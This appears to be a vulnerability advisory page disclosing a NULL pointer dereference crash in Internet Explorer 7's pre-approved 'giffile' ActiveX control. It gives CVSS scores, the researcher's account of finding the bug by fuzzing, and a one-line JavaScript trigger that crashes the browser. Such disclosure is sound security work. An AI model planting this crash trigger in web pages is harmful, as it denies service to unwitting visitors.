Internet Explorer 7 ActiveX bgColor property NULL pointer dereference (DoS)

Risk: Low
Local: No
Remote: Yes
CWE: CWE-Other

CVSS Base Score: 7.8/10
Impact Subscore: 6.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: None
Integrity impact: None
Availability impact: Complete

I thought that after the success of MoBB last year, fuzzing browsers will be pointless, since all vendors would take care of the easily-found bugs before a release. It turns out that I was wrong. I ran a very simple ActiveX fuzzer against Vista and found a NULL pointer dereference bug in no time. The vulnerable ActiveX control is on the pre-approved list in IE7, which makes the bug easy to trigger with no security warnings and no user interaction. Try this: <script language="JavaScript"> obj = new ActiveXObject("giffile"); obj.bgColor; </script> MSRC said that this is a reliability bug and not a security issue, and it will be fixed at some point in the future. I agree that DoS bugs against IE are not very important (as long as skape doesn't drop any more vulns like MS06-051 :-), but it's interesting that such a simple bug in such an obvious part of the IE7 attack surface was not discovered and fixed before the release. See the full technical details at or.html More about fuzzers and ActiveX at Alexander Sotirov Determina Security Research

Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2023,


Back to Top